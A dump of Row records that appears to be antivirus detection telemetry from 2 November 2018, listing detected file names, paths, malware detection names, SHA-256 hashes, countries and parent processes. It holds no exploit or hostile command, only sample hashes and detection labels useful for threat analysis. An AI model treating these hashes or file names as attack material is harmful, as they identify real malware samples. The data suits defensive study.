  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15CDC877B347566B3E988688C259784EE564A86FFBC11098419B7A41E5C66654', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.324\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.324\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta 2010الجديده.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DEBAAE4C73958199395966DE44CD51866AC16C04D51F57FABDF1FAA81B1E314', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:34:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09d49a2ba912849e6db2a18405121a2b7b4196fea9cf0d1f3920cbc09b42f47e.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.available\\Avira\\09D49A2BA912849E6DB2A18405121A2B7B4196FEA9CF0D1F3920CBC09B42F47E.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09d49a2ba912849e6db2a18405121a2b7b4196fea9cf0d1f3920cbc09b42f47e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:14:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dxab6bf.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaB6BE.tmp\\dxaB6BF.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:37:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050308-8f4f18e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050308-8F4F18E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050249-83b6fc76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050249-83B6FC76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='golf.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\GOLF\\GOLF.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054800-d3b0a9a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054800-D3B0A9A4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052806-0c56c9f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052806-0C56C9F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051600-5b959c14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051600-5B959C14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092451-40c59853', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_972b3ccb\\AVSCAN-20181102-092302-3615E97D\\AVSCAN-20181102-092451-40C59853', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230906-c1f1caf6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9d377eb\\AVSCAN-20181102-230818-BD5B29E2\\AVSCAN-20181102-230906-C1F1CAF6', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054243-170bc9c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054243-170BC9C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061500-998cf684', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061500-998CF684', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\Installs\\Discover 3D Encom\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='D:\\Installs\\Discover 3D Encom\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:40:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050253-8654792d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050253-8654792D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054718-bacda488', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054718-BACDA488', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051759-a276e9a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051759-A276E9A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grvxifph.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\gRVXiFph.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050355-ab52c763', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050355-AB52C763', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053137-89f875e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053137-89F875E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jlcyomsr.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\JLcYOMSR.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153844-ff2930e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153844-FF2930E8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cttunesvr.exe', filepath='C:\\Windows\\System32\\cttunesvr.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6a42b9e2919f109a88b3508015da3800d779d90a55a7bcb63b2203e0b000099a', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054635-a0f58791', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054635-A0F58791', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061955-4922771c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061955-4922771C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055149-5c6b03a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055149-5C6B03A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d38c6bb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D38C6BB5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062538-156e9a6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062538-156E9A6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062007-505438d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062007-505438D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052309-5afaa715', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052309-5AFAA715', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061159-2db08b13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061159-2DB08B13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052956-4dc83172', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052956-4DC83172', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050446-c9aeb7f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050446-C9AEB7F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053512-09dcdea1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053512-09DCDEA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053826-7dc4be5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053826-7DC4BE5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061834-18ca180a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061834-18CA180A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062039-63824478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062039-63824478', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052047-06852e23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052047-06852E23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054033-c94de888', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054033-C94DE888', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062109-7525d387', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062109-7525D387', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:07Z'), dt=datetime.date(2018, 11, 2)),
